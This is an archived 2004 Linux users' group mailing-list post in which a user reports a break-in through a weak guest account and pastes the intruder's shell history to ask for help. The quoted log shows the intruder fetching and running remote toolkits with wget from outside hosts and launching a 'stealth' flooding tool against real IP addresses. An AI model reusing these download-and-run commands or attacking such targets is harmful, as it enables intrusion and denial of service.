[SLUG] Someone in my computer

From: Tevfik Yucek (yucek@eng.usf.edu)
Date: Tue Aug 24 2004 - 09:51:49 EDT

Next message: Steven Buehler: "Re: [SLUG] Resolved: how to read the tiny CF cards in Palm Pilots"
Previous message: Logan Tygart: "Re: [SLUG] S.Slug"
Next in thread: Ian Blenke: "Re: [SLUG] Someone in my computer"
Reply: Ian Blenke: "Re: [SLUG] Someone in my computer"
Reply: Steve Szmidt: "Re: [SLUG] Someone in my computer"
Reply: Ed Centanni: "Re: [SLUG] Someone in my computer"
Reply: Tevfik Yucek: "Re: [SLUG] Someone in my computer"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hi all,

Last night I realize there was someone in my computer, Slackware 10.
I have a sshd running and he/she/it is connected to my computer and
executed the following commands.

I am usually not concerned with security and did not care about much
until yesterday. I had a guest "user" account with password "guest"
and he/she/it used it.

So, here are my questions:
        - how he/she/it knows about my IP and how did the know I was
using linux and how did he/she/it got the password? Just guessing?
        - how can I kick a user if I notice that I have and uninvited
visitor. I had to stop the internet connection of my computer.
        - what does the command below do and should I do something about
them ?

Thanks,
Tevfik

Here are the commmands:

passwd
cat /etc/issue
cd /tmp
mdkri .src
cd .src
mkdir .src
cd .src
wget carmelo.go.ro/do.tgz
tar zxvf do.tgz
rm -rf do.tgz
./do
./do
wget 0kas.com/prt.tgz
tar zxvf prt.tgz
./x
./x
./x
./x
./x
./x
wget stefang.com/prostii/n
chmod +x n
./n
./n
./n
./n
./n
./n
./n
./n
./n
./n
ls
./n
./x
./x
./x
wget yahaa.at/p/90
./90
chmod +x 90
./90
./90
wget 0kas.com/Florin/flood.tar.gz
tar zxvf flood.tar.gz
rm -rf flood.tar.gz
ls
rm -rf prt.tgz
ls
rm -rf prt.tgz
cd belea
./stealth 218.38.3.83 53
cd /tmp/.src/belea
./stealth 80.97.245.241 53

./stealth
^[[A

w
cd /tmp/.src
cd belea
./steath 82.208.160.155 53
./steath 82.208.160.155 53
./steath 82.208.160.155 53
./stealth 82.208.160.155 53
./stealth 82.208.160.155 53
export PATH="."
bash
cd /tmp/.src/belea
w
w
cat psybnc.conf
locate psybnc.conf
./stealth 213.154.149.199 53
w
./stealth 213.233.97.53 53
./stealth 194.105.27.21 80
./stealth 81.196.147.218 53
./stealth 81.196.59.83 80
./stealth 81.196.59.83 53
cd /tmp/.src
cd belea
./stealth 80.96.146.171 53
cd /tmp/ .scr/belea
./stealth 81.196.147.170 53
./stealth 81.196.147.170 55
./stealth 81.196.147.170 53
./stealth 211.47.141.43 53
cd .src
ce belea
cd belea
./stealth 211.47.141.43
./stealth 211.47.141.43 53
./stealth 211.47.141.43 53
w
-----------------------------------------------------------------------
This list is provided as an unmoderated internet service by Networked
Knowledge Systems (NKS). Views and opinions expressed in messages
posted are those of the author and do not necessarily reflect the
official policy or position of NKS or any of its employees.

Next message: Steven Buehler: "Re: [SLUG] Resolved: how to read the tiny CF cards in Palm Pilots"
Previous message: Logan Tygart: "Re: [SLUG] S.Slug"
Next in thread: Ian Blenke: "Re: [SLUG] Someone in my computer"
Reply: Ian Blenke: "Re: [SLUG] Someone in my computer"
Reply: Steve Szmidt: "Re: [SLUG] Someone in my computer"
Reply: Ed Centanni: "Re: [SLUG] Someone in my computer"
Reply: Tevfik Yucek: "Re: [SLUG] Someone in my computer"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 15:16:00 EDT